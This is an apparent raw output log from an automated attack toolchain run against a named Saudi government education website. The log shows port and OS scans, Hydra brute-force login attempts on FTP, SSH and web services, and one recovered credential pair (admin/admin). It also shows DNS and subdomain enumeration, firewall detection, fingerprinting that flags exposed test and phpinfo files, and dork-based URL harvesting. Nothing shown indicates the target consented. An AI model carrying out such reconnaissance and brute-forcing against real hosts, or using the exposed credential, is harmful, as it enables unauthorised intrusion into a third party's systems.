139/udp  open|filtered netbios-ssn
161/udp  open|filtered snmp
162/udp  open|filtered snmptrap
389/udp  open|filtered ldap
520/udp  open|filtered route
2049/udp open|filtered nfs
Too many fingerprints match this host to give specific OS details

TRACEROUTE (using port 138/udp)
HOP RTT       ADDRESS
1   119.71 ms 10.251.200.1
2   ... 3
4   120.04 ms 10.251.200.1
5   121.68 ms 10.251.200.1
6   121.66 ms 10.251.200.1
7   121.65 ms 10.251.200.1
8   121.71 ms 10.251.200.1
9   121.69 ms 10.251.200.1
10  121.68 ms 10.251.200.1
11  ... 18
19  125.07 ms 10.251.200.1
20  128.59 ms 10.251.200.1
21  ... 27
28  120.85 ms 10.251.200.1
29  ...
30  120.01 ms 10.251.200.1

NSE: Script Post-scanning.
Initiating NSE at 04:14
Completed NSE at 04:14, 0.00s elapsed
Initiating NSE at 04:14
Completed NSE at 04:14, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 171.51 seconds
           Raw packets sent: 147 (9.964KB) | Rcvd: 1007 (500.157KB)
#######################################################################################################################################
Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-19 04:14 EST
Nmap scan report for 85.17.16.76
Host is up (0.12s latency).
Not shown: 19 filtered ports, 3 closed ports
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT    STATE SERVICE
21/tcp  open  ftp
22/tcp  open  ssh
80/tcp  open  http
443/tcp open  https
#######################################################################################################################################

 + -- --=[Port 21 opened... running tests...
Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2018-11-19 04:14:41
[DATA] max 1 task per 1 server, overall 1 task, 225 login tries, ~225 tries per task
[DATA] attacking ftp://85.17.16.76:21/
[STATUS] 78.00 tries/min, 78 tries in 00:01h, 150 to do in 00:02h, 1 active
1 of 1 target completed, 0 valid passwords found
Hydra (http://www.thc.org/thc-hydra) finished at 2018-11-19 04:17:35
 + -- --=[Port 22 opened... running tests...
Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2018-11-19 04:17:35
[DATA] max 1 task per 1 server, overall 1 task, 363 login tries, ~363 tries per task
[DATA] attacking ssh://85.17.16.76:22/
Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2018-11-19 04:17:36
[DATA] max 1 task per 1 server, overall 1 task, 1530 login tries (l:34/p:45), ~1530 tries per task
[DATA] attacking ssh://85.17.16.76:22/
 + -- --=[Port 23 closed... skipping.
 + -- --=[Port 25 closed... skipping.
 + -- --=[Port 80 opened... running tests...
Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2018-11-19 04:17:36
[DATA] max 1 task per 1 server, overall 1 task, 1530 login tries (l:34/p:45), ~1530 tries per task
[DATA] attacking http-get://85.17.16.76:80//
[80][http-get] host: 85.17.16.76   login: admin   password: admin
[STATUS] attack finished for 85.17.16.76 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2018-11-19 04:17:37
 + -- --=[Port 110 closed... skipping.
 + -- --=[Port 139 closed... skipping.
 + -- --=[Port 162 closed... skipping.
 + -- --=[Port 389 closed... skipping.
 + -- --=[Port 443 opened... running tests...
Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2018-11-19 04:17:37
[DATA] max 1 task per 1 server, overall 1 task, 1530 login tries (l:34/p:45), ~1530 tries per task
[DATA] attacking http-gets://85.17.16.76:443//
[STATUS] 103.00 tries/min, 103 tries in 00:01h, 1430 to do in 00:14h, 1 active
[STATUS] 101.00 tries/min, 303 tries in 00:03h, 1230 to do in 00:13h, 1 active
[STATUS] 93.57 tries/min, 655 tries in 00:07h, 878 to do in 00:10h, 1 active
[STATUS] 91.08 tries/min, 1093 tries in 00:12h, 440 to do in 00:05h, 1 active
[STATUS] 90.06 tries/min, 1531 tries in 00:17h, 2 to do in 00:01h, 1 active
1 of 1 target completed, 0 valid passwords found
Hydra (http://www.thc.org/thc-hydra) finished at 2018-11-19 04:34:39
 + -- --=[Port 445 closed... skipping.
 + -- --=[Port 512 closed... skipping.
 + -- --=[Port 513 closed... skipping.
 + -- --=[Port 514 closed... skipping.
 + -- --=[Port 993 closed... skipping.
 + -- --=[Port 1433 closed... skipping.
 + -- --=[Port 1521 closed... skipping.
 + -- --=[Port 3306 closed... skipping.
 + -- --=[Port 3389 closed... skipping.
 + -- --=[Port 5432 closed... skipping.
 + -- --=[Port 5900 closed... skipping.
 + -- --=[Port 5901 closed... skipping.
 + -- --=[Port 8000 closed... skipping.
 + -- --=[Port 8080 closed... skipping.
 + -- --=[Port 8100 closed... skipping.
 + -- --=[Port 6667 closed... skipping.
#######################################################################################################################################
dnsenum VERSION:1.2.4

-----   www.hbthedu.gov.sa   -----


Host's addresses:
__________________

hbthedu.gov.sa.                          13906    IN    A        85.17.16.76


Name Servers:
______________

ns1.dimofinf.net.                        174      IN    A        45.55.127.247
ns2.dimofinf.net.                        300      IN    A        167.99.30.33
ns3.dimofinf.net.                        300      IN    A        95.179.144.169


Mail (MX) Servers:
___________________

aspmx.l.google.com.                      293      IN    A        64.233.167.26
alt3.aspmx.l.google.com.                 293      IN    A        108.177.125.26
alt2.aspmx.l.google.com.                 293      IN    A        172.217.194.26
alt4.aspmx.l.google.com.                 293      IN    A        74.125.195.26
alt1.aspmx.l.google.com.                 279      IN    A        64.233.164.26


Trying Zone Transfers and getting Bind Versions:
_________________________________________________


Trying Zone Transfer for www.hbthedu.gov.sa on ns1.dimofinf.net ...

Trying Zone Transfer for www.hbthedu.gov.sa on ns2.dimofinf.net ...

Trying Zone Transfer for www.hbthedu.gov.sa on ns3.dimofinf.net ...

brute force file not specified, bay.
#######################################################################################################################################

Running Source: [33;1;1mAsk
Running Source: [33;1;1mArchive.is
Running Source: [33;1;1mBaidu
Running Source: [33;1;1mBing
Running Source: [33;1;1mCertDB
Running Source: [33;1;1mCertificateTransparency
Running Source: [33;1;1mCertspotter
Running Source: [33;1;1mCommoncrawl
Running Source: [33;1;1mCrt.sh
Running Source: [33;1;1mDnsdb
Running Source: [33;1;1mDNSDumpster
Running Source: [33;1;1mDNSTable
Running Source: [33;1;1mDogpile
Running Source: [33;1;1mExalead
Running Source: [33;1;1mFindsubdomains
Running Source: [33;1;1mGoogleter
Running Source: [33;1;1mHackertarget
Running Source: [33;1;1mIpv4Info
Running Source: [33;1;1mPTRArchive
Running Source: [33;1;1mSitedossier
Running Source: [33;1;1mThreatcrowd
Running Source: [33;1;1mThreatMiner
Running Source: [33;1;1mWaybackArchive
Running Source: [33;1;1mYahoo

Running enumeration on www.hbthedu.gov.sa

dnsdb: Unexpected return status 503

waybackarchive: Get https://web.archive.org/cdx/search/cdx?url=*.www.hbthedu.gov.sa/*&output=json&fl=original&collapse=urlkey&page=: net/http: invalid header field value "http://web.archive.org/cdx/search/cdx?url=*.www.hbthedu.gov.sa/*&output=json&fl=original&collapse=urlkey&page=\x00" for key Referer


Starting Bruteforcing of [33;1;1mwww.hbthedu.gov.sa with [33;1;1m9985 words

Total [33;1;1m1 Unique subdomains found for www.hbthedu.gov.sa

.www.hbthedu.gov.sa
#######################################################################################################################################
[*] Processing domain www.hbthedu.gov.sa
[+] Getting nameservers
45.55.127.247 - ns1.dimofinf.net
95.179.144.169 - ns3.dimofinf.net
167.99.30.33 - ns2.dimofinf.net
[-] Zone transfer failed

[+] MX records found, added to target list
1 aspmx.l.google.com.
10 alt3.aspmx.l.google.com.
5 alt2.aspmx.l.google.com.
10 alt4.aspmx.l.google.com.
5 alt1.aspmx.l.google.com.

[*] Scanning www.hbthedu.gov.sa for A records
85.17.16.76 - www.hbthedu.gov.sa

#######################################################################################################################################
[+] www.hbthedu.gov.sa has no SPF record!
[*] No DMARC record found. Looking for organizational record
[+] No organizational DMARC record
[+] Spoofing possible for www.hbthedu.gov.sa!
#######################################################################################################################################
  ____ _____ ___  ______ _/ /_____  ____  ___
 / __ `/ __ `/ / / / __ `/ __/ __ \/ __ \/ _ \
/ /_/ / /_/ / /_/ / /_/ / /_/ /_/ / / / /  __/
\__,_/\__, /\__,_/\__,_/\__/\____/_/ /_/\___/
        /_/  discover v0.5.0 - by @michenriksen

Identifying nameservers for www.hbthedu.gov.sa... Done
Using nameservers:

 - 45.55.127.247
 - 95.179.144.169
 - 167.99.30.33

Checking for wildcard DNS... Done

Running collector: Threat Crowd... Done (0 hosts)
Running collector: DNSDB... Error
 -> DNSDB returned unexpected response code: 503
Running collector: Netcraft... Done (0 hosts)
Running collector: PublicWWW... Done (0 hosts)
Running collector: Censys... Skipped
 -> Key 'censys_secret' has not been set
Running collector: Wayback Machine... Done (2 hosts)
Running collector: PTRArchive... Error
 -> PTRArchive returned unexpected response code: 502
Running collector: PassiveTotal... Skipped
 -> Key 'passivetotal_key' has not been set
Running collector: Shodan... Skipped
 -> Key 'shodan' has not been set
Running collector: Riddler... Skipped
 -> Key 'riddler_username' has not been set
Running collector: VirusTotal... Skipped
 -> Key 'virustotal' has not been set
Running collector: Dictionary... Done (0 hosts)
Running collector: HackerTarget... Done (1 host)
Running collector: Google Transparency Report... Done (0 hosts)
Running collector: Certificate Search... Done (0 hosts)

Resolving 2 unique hosts...
85.17.16.76     hbthedu.gov.sa
85.17.16.76     www.hbthedu.gov.sa

Found subnets:

 - 85.17.16.0-255    : 2 hosts

Wrote 2 hosts to:

 - file:///root/aquatone/www.hbthedu.gov.sa/hosts.txt
 - file:///root/aquatone/www.hbthedu.gov.sa/hosts.json
                           __
  ____ _____ ___  ______ _/ /_____  ____  ___
 / __ `/ __ `/ / / / __ `/ __/ __ \/ __ \/ _ \
/ /_/ / /_/ / /_/ / /_/ / /_/ /_/ / / / /  __/
\__,_/\__, /\__,_/\__,_/\__/\____/_/ /_/\___/
        /_/  takeover v0.5.0 - by @michenriksen

Loaded 2 hosts from /root/aquatone/www.hbthedu.gov.sa/hosts.json
Loaded 25 domain takeover detectors

Identifying nameservers for www.hbthedu.gov.sa... Done
Using nameservers:

 - 45.55.127.247
 - 95.179.144.169
 - 167.99.30.33

Checking hosts for domain takeover vulnerabilities...

Finished checking hosts:

 - Vulnerable     : 0
 - Not Vulnerable : 2

Wrote 0 potential subdomain takeovers to:

 - file:///root/aquatone/www.hbthedu.gov.sa/takeovers.json

                           __
  ____ _____ ___  ______ _/ /_____  ____  ___
 / __ `/ __ `/ / / / __ `/ __/ __ \/ __ \/ _ \
/ /_/ / /_/ / /_/ / /_/ / /_/ /_/ / / / /  __/
\__,_/\__, /\__,_/\__,_/\__/\____/_/ /_/\___/
        /_/  scan v0.5.0 - by @michenriksen

Loaded 2 hosts from /root/aquatone/www.hbthedu.gov.sa/hosts.json

Probing 2 ports...
80/tcp    85.17.16.76     hbthedu.gov.sa, www.hbthedu.gov.sa
443/tcp   85.17.16.76     hbthedu.gov.sa, www.hbthedu.gov.sa

Wrote open ports to file:///root/aquatone/www.hbthedu.gov.sa/open_ports.txt
Wrote URLs to file:///root/aquatone/www.hbthedu.gov.sa/urls.txt
                           __
  ____ _____ ___  ______ _/ /_____  ____  ___
 / __ `/ __ `/ / / / __ `/ __/ __ \/ __ \/ _ \
/ /_/ / /_/ / /_/ / /_/ / /_/ /_/ / / / /  __/
\__,_/\__, /\__,_/\__,_/\__/\____/_/ /_/\___/
        /_/  gather v0.5.0 - by @michenriksen

Processing 4 pages...

Incompatability Error: Nightmarejs must be run on a system with a graphical desktop session (X11)
#######################################################################################################################################
Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-19 03:59 EST
Nmap scan report for www.hbthedu.gov.sa (85.17.16.76)
Host is up (0.13s latency).
Not shown: 467 filtered ports, 3 closed ports
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT     STATE SERVICE
21/tcp   open  ftp
22/tcp   open  ssh
80/tcp   open  http
443/tcp  open  https
8888/tcp open  sun-answerbook
8890/tcp open  ddi-tcp-3
#######################################################################################################################################
Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-19 03:59 EST
Nmap scan report for www.hbthedu.gov.sa (85.17.16.76)
Host is up (0.12s latency).
Not shown: 2 filtered ports
PORT     STATE         SERVICE
53/udp   open|filtered domain
67/udp   open|filtered dhcps
68/udp   open|filtered dhcpc
69/udp   open|filtered tftp
88/udp   open|filtered kerberos-sec
123/udp  open|filtered ntp
139/udp  open|filtered netbios-ssn
161/udp  open|filtered snmp
162/udp  open|filtered snmptrap
389/udp  open|filtered ldap
520/udp  open|filtered route
2049/udp open|filtered nfs
#######################################################################################################################################
Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-19 04:00 EST
Nmap scan report for www.hbthedu.gov.sa (85.17.16.76)
Host is up (0.13s latency).

PORT   STATE SERVICE VERSION
21/tcp open  ftp?
| fingerprint-strings:
|   GenericLines, GetRequest, Help, NULL:
|     Your connection to this server has been blocked in this network firewall.
|     need to contact the network admin at [security@dimofinf.net] for further information.
|     Your blocked IP address is 194.187.249.229.
|     This server's hostname is unlimited6.dimofinf.net.
|     more information visit: https://www.dimofinf.net/knowledgebase.php?action=displayarticle&id=446
|_    Dimofinf Technologies Inc.
|_ftp-bounce: ERROR: Script execution failed (use -d to debug)
| ftp-brute:
|   Accounts: No valid accounts found
|_  Statistics: Performed 1456 guesses in 185 seconds, average tps: 8.5
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port21-TCP:V=7.70%I=7%D=11/19%Time=5BF27BA6%P=x86_64-pc-linux-gnu%r(NUL
SF:L,18A,"Your\x20connection\x20to\x20this\x20server\x20has\x20been\x20blo
SF:cked\x20in\x20this\x20network\x20firewall\.\r\nYou\x20need\x20to\x20con
SF:tact\x20the\x20network\x20admin\x20at\x20\[security@dimofinf\.net\]\x20
SF:for\x20further\x20information\.\r\nYour\x20blocked\x20IP\x20address\x20
SF:is\x20194\.187\.249\.229\.\r\nThis\x20server's\x20hostname\x20is\x20unl
SF:imited6\.dimofinf\.net\.\r\nFor\x20more\x20information\x20visit:\x20htt
SF:ps://www\.dimofinf\.net/knowledgebase\.php\?action=displayarticle&id=44
SF:6\r\n\r\nDimofinf\x20Technologies\x20Inc\.\r\n")%r(GenericLines,18A,"Yo
SF:ur\x20connection\x20to\x20this\x20server\x20has\x20been\x20blocked\x20i
SF:n\x20this\x20network\x20firewall\.\r\nYou\x20need\x20to\x20contact\x20t
SF:he\x20network\x20admin\x20at\x20\[security@dimofinf\.net\]\x20for\x20fu
SF:rther\x20information\.\r\nYour\x20blocked\x20IP\x20address\x20is\x20194
SF:\.187\.249\.229\.\r\nThis\x20server's\x20hostname\x20is\x20unlimited6\.
SF:dimofinf\.net\.\r\nFor\x20more\x20information\x20visit:\x20https://www\
SF:.dimofinf\.net/knowledgebase\.php\?action=displayarticle&id=446\r\n\r\n
SF:Dimofinf\x20Technologies\x20Inc\.\r\n")%r(Help,18A,"Your\x20connection\
SF:x20to\x20this\x20server\x20has\x20been\x20blocked\x20in\x20this\x20netw
SF:ork\x20firewall\.\r\nYou\x20need\x20to\x20contact\x20the\x20network\x20
SF:admin\x20at\x20\[security@dimofinf\.net\]\x20for\x20further\x20informat
SF:ion\.\r\nYour\x20blocked\x20IP\x20address\x20is\x20194\.187\.249\.229\.
SF:\r\nThis\x20server's\x20hostname\x20is\x20unlimited6\.dimofinf\.net\.\r
SF:\nFor\x20more\x20information\x20visit:\x20https://www\.dimofinf\.net/kn
SF:owledgebase\.php\?action=displayarticle&id=446\r\n\r\nDimofinf\x20Techn
SF:ologies\x20Inc\.\r\n")%r(GetRequest,18A,"Your\x20connection\x20to\x20th
SF:is\x20server\x20has\x20been\x20blocked\x20in\x20this\x20network\x20fire
SF:wall\.\r\nYou\x20need\x20to\x20contact\x20the\x20network\x20admin\x20at
SF:\x20\[security@dimofinf\.net\]\x20for\x20further\x20information\.\r\nYo
SF:ur\x20blocked\x20IP\x20address\x20is\x20194\.187\.249\.229\.\r\nThis\x2
SF:0server's\x20hostname\x20is\x20unlimited6\.dimofinf\.net\.\r\nFor\x20mo
SF:re\x20information\x20visit:\x20https://www\.dimofinf\.net/knowledgebase
SF:\.php\?action=displayarticle&id=446\r\n\r\nDimofinf\x20Technologies\x20
SF:Inc\.\r\n");
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|specialized|storage-misc
Running (JUST GUESSING): Linux 3.X|4.X (91%), Crestron 2-Series (87%), HP embedded (85%), Oracle VM Server 3.X (85%)
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4 cpe:/o:crestron:2_series cpe:/h:hp:p2000_g3 cpe:/o:oracle:vm_server:3.4.2 cpe:/o:linux:linux_kernel:4.1
Aggressive OS guesses: Linux 3.10 - 4.11 (91%), Linux 3.2 - 4.9 (91%), Linux 3.18 (89%), Crestron XPanel control system (87%), Linux 3.16 (86%), HP P2000 G3 NAS device (85%), Oracle VM Server 3.4.2 (Linux 4.1) (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 9 hops

TRACEROUTE (using port 21/tcp)
HOP RTT       ADDRESS
1   120.85 ms 10.251.200.1
2   120.90 ms vlan200.bb1.par1.fr.m247.com (185.94.189.129)
3   130.52 ms 82.102.29.40
4   130.56 ms 176.10.83.5
5   133.03 ms hu-0-6-0-0.bb03.ams-01.leaseweb.net (80.249.208.215)
6   132.65 ms ae-104.br01.ams-01.nl.leaseweb.net (31.31.38.141)
7   132.61 ms 81.17.34.17
8   131.99 ms po-1005.ce02.ams-01.nl.leaseweb.net (81.17.33.141)
9   131.97 ms 85.17.16.76
########################################################################################################################################
(gen) header: Your connection to this server has been blocked in this network firewall.
You need to contact the network admin at [security@dimofinf.net] for further information.
Your blocked IP address is 194.187.249.229.
This server's hostname is unlimited6.dimofinf.net.
For more information visit: https://www.dimofinf.net/knowledgebase.php?action=displayarticle&id=446
Dimofinf Technologies Inc.

[

                                 ^     ^
        _   __  _   ____ _   __  _    _   ____
       ///7/ /.' \ / __////7/ /,' \ ,' \ / __/
      | V V // o // _/ | V V // 0 // 0 // _/
      |_n_,'/_n_//_/   |_n_,' \_,' \_,'/_/
                                <
                                ...'

    WAFW00F - Web Application Firewall Detection Tool

    By Sandro Gauci && Wendel G. Henrique

Checking http://www.hbthedu.gov.sa
Generic Detection results:
No WAF detected by the generic detection
Number of requests: 14
#######################################################################################################################################
http://www.hbthedu.gov.sa [200 OK] Cookies[PHPSESSID,dim_lastactivity,dim_lastvisit,dim_sessionhash,dim_styleid], Country[NETHERLANDS][NL], Frame, HTML5, HttpOnly[dim_sessionhash,dim_styleid], IP[85.17.16.76], JQuery, MetaGenerator[Dimofinf  v4.0.0], PoweredBy[Dimofinf], Script[javascript,text/javascript], Title[تعليم حوطة بني تميم والحريق], UncommonHeaders[access-control-allow-origin,x-nginx-cache-status,x-server-powered-by], X-XSS-Protection[1; mode=block], x-pingback[http://www.hbthedu.gov.sa/xmlrpc.php]
#######################################################################################################################################
wig - WebApp Information Gatherer


Scanning http://www.hbthedu.gov.sa...
____________________ SITE INFO ____________________
IP              Title
85.17.16.76     تعليم حوطة بني تميم والحريق

_____________________ VERSION _____________________
Name            Versions        Type
PHP             5.4.45          Platform
FreeBSD         10 | 11         OS
OpenBSD         5.9             OS

___________________ INTERESTING ___________________
URL             Note            Type
/test.php       Test file       Interesting
/test.htm       Test file       Interesting
/info.php       PHP info file   Interesting
/test/          Test directory  Interesting
/login.php      Login Page      Interesting
/login.htm      Login Page      Interesting

___________________________________________________
Time: 84.4 sec  Urls: 655       Fingerprints: 40401
#######################################################################################################################################
HTTP/1.1 200 OK
Date: Mon, 19 Nov 2018 09:06:49 GMT
Content-Type: text/html
Vary: Accept-Encoding
X-Pingback: http://www.hbthedu.gov.sa/xmlrpc.php
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=bocvji018ehb7ur0dbj4r17c60; path=/
Set-Cookie: dim_styleid=1; expires=Tue, 19-Nov-2019 09:06:48 GMT; path=/; HttpOnly
Set-Cookie: dim_sessionhash=3b2ce99e2be9ba16af1babf37a5943f5; path=/; HttpOnly
Set-Cookie: dim_lastvisit=1542618408; expires=Tue, 19-Nov-2019 09:06:48 GMT; path=/
Set-Cookie: dim_lastactivity=0; expires=Tue, 19-Nov-2019 09:06:48 GMT; path=/
Access-Control-Allow-Origin: *
X-XSS-Protection: 1; mode=block
X-Nginx-Cache-Status: EXPIRED
X-Server-Powered-By: Dimofinf INC
Content-Encoding: gzip
Connection: keep-alive
#######################################################################################################################################
---------------------------------------------------------------------------------------------------------------------------------------

[ ! ] Starting SCANNER INURLBR 2.1 at [19-11-2018 04:07:27]
[ ! ] legal disclaimer: Usage of INURLBR for attacking targets without prior mutual consent is illegal.
It is the end user's responsibility to obey all applicable local, state and federal laws.
Developers assume no liability and are not responsible for any misuse or damage caused by this program

[ INFO ][ OUTPUT FILE ]:: [ /usr/share/sniper/output/inurlbr-www.hbthedu.gov.sa.txt  ]
[ INFO ][ DORK ]::[ site:www.hbthedu.gov.sa ]
[ INFO ][ SEARCHING ]:: {
[ INFO ][ ENGINE ]::[ GOOGLE - www.google.sm ]

[ INFO ][ SEARCHING ]::
-[:::]
[ INFO ][ ENGINE ]::[ GOOGLE API ]

[ INFO ][ SEARCHING ]::
-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]
[ INFO ][ ENGINE ]::[ GOOGLE_GENERIC_RANDOM - www.google.com.bn ID: 005911257635119896548:iiolgmwf2se ]

[ INFO ][ SEARCHING ]::
-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]

[ INFO ][ TOTAL FOUND VALUES ]:: [ 100 ]


 _[ - ]::--------------------------------------------------------------------------------------------------------------
|_[ + ] [ 0 / 100 ]-[04:07:39] [ - ]
|_[ + ] Target:: [ http://www.hbthedu.gov.sa/ ]
|_[ + ] Exploit::
|_[ + ] Information Server:: HTTP/1.1 200 OK,   , IP:85.17.16.76:80
|_[ + ] More details::  / -  / , ISP:
|_[ + ] Found:: UNIDENTIFIED

 _[ - ]::--------------------------------------------------------------------------------------------------------------
|_[ + ] [ 1 / 100 ]-[04:07:41] [ - ]
|_[ + ] Target:: [ http://www.hbthedu.gov.sa/vid/l ]
|_[ + ] Exploit::
|_[ + ] Information Server:: HTTP/1.1 200 OK,   , IP:85.17.16.76:80
|_[ + ] More details::  / -  / , ISP:
|_[ + ] Found:: UNIDENTIFIED

 _[ - ]::--------------------------------------------------------------------------------------------------------------
|_[ + ] [ 2 / 100 ]-[04:07:44] [ - ]
|_[ + ] Target:: [ http://www.hbthedu.gov.sa/new/s/812 ]
|_[ + ] Exploit::
|_[ + ] Information Server:: HTTP/1.1 200 OK,   , IP:85.17.16.76:80
|_[ + ] More details::  / -  / , ISP:
|_[ + ] Found:: UNIDENTIFIED

 _[ - ]::--------------------------------------------------------------------------------------------------------------
|_[ + ] [ 3 / 100 ]-[04:07:45] [ - ]
|_[ + ] Target:: [ http://www.hbthedu.gov.sa/new/s/9131 ]
|_[ + ] Exploit::
|_[ + ] Information Server:: HTTP/1.1 200 OK,   , IP:85.17.16.76:80
|_[ + ] More details::  / -  / , ISP:
|_[ + ] Found:: UNIDENTIFIED

 _[ - ]::--------------------------------------------------------------------------------------------------------------
|_[ + ] [ 4 / 100 ]-[04:07:47] [ - ]
|_[ + ] Target:: [ http://www.hbthedu.gov.sa/new/s/8889 ]
|_[ + ] Exploit::
|_[ + ] Information Server:: HTTP/1.1 200 OK,   , IP:85.17.16.76:80
|_[ + ] More details::  / -  / , ISP:
|_[ + ] Found:: UNIDENTIFIED

 _[ - ]::--------------------------------------------------------------------------------------------------------------
|_[ + ] [ 5 / 100 ]-[04:07:49] [ - ]
|_[ + ] Target:: [ http://www.hbthedu.gov.sa/new/s/7562 ]
|_[ + ] Exploit::
|_[ + ] Information Server:: HTTP/1.1 200 OK,   , IP:85.17.16.76:80
|_[ + ] More details::  / -  / , ISP:
|_[ + ] Found:: UNIDENTIFIED

 _[ - ]::--------------------------------------------------------------------------------------------------------------
|_[ + ] [ 6 / 100 ]-[04:07:50] [ - ]
|_[ + ] Target:: [ http://www.hbthedu.gov.sa/new/s/988 ]
|_[ + ] Exploit::
|_[ + ] Information Server:: HTTP/1.1 200 OK,   , IP:85.17.16.76:80
|_[ + ] More details::  / -  / , ISP:
|_[ + ] Found:: UNIDENTIFIED

 _[ - ]::--------------------------------------------------------------------------------------------------------------
|_[ + ] [ 7 / 100 ]-[04:07:52] [ - ]
|_[ + ] Target:: [ http://www.hbthedu.gov.sa/new/s/8627 ]
|_[ + ] Exploit::
|_[ + ] Information Server:: HTTP/1.1 200 OK,   , IP:85.17.16.76:80
|_[ + ] More details::  / -  / , ISP:
|_[ + ] Found:: UNIDENTIFIED

 _[ - ]::--------------------------------------------------------------------------------------------------------------
|_[ + ] [ 8 / 100 ]-[04:07:53] [ - ]
|_[ + ] Target:: [ http://www.hbthedu.gov.sa/new/s/967 ]
|_[ + ] Exploit::
|_[ + ] Information Server:: HTTP/1.1 200 OK,   , IP:85.17.16.76:80
|_[ + ] More details::  / -  / , ISP:
|_[ + ] Found:: UNIDENTIFIED

 _[ - ]::--------------------------------------------------------------------------------------------------------------
|_[ + ] [ 9 / 100 ]-[04:07:55] [ - ]
|_[ + ] Target:: [ http://www.hbthedu.gov.sa/new/s/8996 ]
|_[ + ] Exploit::
|_[ + ] Information Server:: HTTP/1.1 200 OK,   , IP:85.17.16.76:80
|_[ + ] More details::  / -  / , ISP:
|_[ + ] Found:: UNIDENTIFIED

 _[ - ]::--------------------------------------------------------------------------------------------------------------
|_[ + ] [ 10 / 100 ]-[04:07:57] [ - ]
|_[ + ] Target:: [ http://www.hbthedu.gov.sa/new/s/2390 ]
|_[ + ] Exploit::
|_[ + ] Information Server:: HTTP/1.1 200 OK,   , IP:85.17.16.76:80
|_[ + ] More details::  / -  / , ISP:
|_[ + ] Found:: UNIDENTIFIED

 _[ - ]::--------------------------------------------------------------------------------------------------------------
|_[ + ] [ 11 / 100 ]-[04:07:58] [ - ]
|_[ + ] Target:: [ http://www.hbthedu.gov.sa/new/s/8544 ]
|_[ + ] Exploit::
|_[ + ] Information Server:: HTTP/1.1 200 OK,   , IP:85.17.16.76:80
|_[ + ] More details::  / -  / , ISP:
|_[ + ] Found:: UNIDENTIFIED

 _[ - ]::--------------------------------------------------------------------------------------------------------------
|_[ + ] [ 12 / 100 ]-[04:08:00] [ - ]
|_[ + ] Target:: [ http://www.hbthedu.gov.sa/vb/ ]
|_[ + ] Exploit::
|_[ + ] Information Server:: HTTP/1.1 200 OK,   , IP:85.17.16.76:80
|_[ + ] More details::  / -  / , ISP:
|_[ + ] Found:: UNIDENTIFIED

 _[ - ]::--------------------------------------------------------------------------------------------------------------
|_[ + ] [ 13 / 100 ]-[04:08:01] [ - ]
|_[ + ] Target:: [ http://www.hbthedu.gov.sa/new/s/2240 ]
|_[ + ] Exploit::
|_[ + ] Information Server:: HTTP/1.1 200 OK,   , IP:85.17.16.76:80
|_[ + ] More details::  / -  / , ISP:
|_[ + ] Found:: UNIDENTIFIED

 _[ - ]::--------------------------------------------------------------------------------------------------------------
|_[ + ] [ 14 / 100 ]-[04:08:03] [ - ]
|_[ + ] Target:: [ http://www.hbthedu.gov.sa/new/s/8760 ]
|_[ + ] Exploit::
|_[ + ] Information Server:: HTTP/1.1 200 OK,   , IP:85.17.16.76:80
|_[ + ] More details::  / -  / , ISP:
|_[ + ] Found:: UNIDENTIFIED

 _[ - ]::--------------------------------------------------------------------------------------------------------------
|_[ + ] [ 15 / 100 ]-[04:08:05] [ - ]
|_[ + ] Target:: [ http://www.hbthedu.gov.sa/new/s/8887 ]
|_[ + ] Exploit::
|_[ + ] Information Server:: HTTP/1.1 200 OK,   , IP:85.17.16.76:80
|_[ + ] More details::  / -  / , ISP:
|_[ + ] Found:: UNIDENTIFIED

 _[ - ]::--------------------------------------------------------------------------------------------------------------
|_[ + ] [ 16 / 100 ]-[04:08:06] [ - ]
|_[ + ] Target:: [ http://www.hbthedu.gov.sa/new/s/9127 ]
|_[ + ] Exploit::
|_[ + ] Information Server:: HTTP/1.1 200 OK,   , IP:85.17.16.76:80
|_[ + ] More details::  / -  / , ISP:
|_[ + ] Found:: UNIDENTIFIED

 _[ - ]::--------------------------------------------------------------------------------------------------------------
|_[ + ] [ 17 / 100 ]-[04:08:08] [ - ]
|_[ + ] Target:: [ http://www.hbthedu.gov.sa/new/s/372 ]
|_[ + ] Exploit::
|_[ + ] Information Server:: HTTP/1.1 200 OK,   , IP:85.17.16.76:80
|_[ + ] More details::  / -  / , ISP:
|_[ + ] Found:: UNIDENTIFIED

 _[ - ]::--------------------------------------------------------------------------------------------------------------
|_[ + ] [ 18 / 100 ]-[04:08:10] [ - ]
|_[ + ] Target:: [ http://www.hbthedu.gov.sa/new/s/1937 ]
|_[ + ] Exploit::
|_[ + ] Information Server:: HTTP/1.1 200 OK,   , IP:85.17.16.76:80
|_[ + ] More details::  / -  / , ISP:
|_[ + ] Found:: UNIDENTIFIED

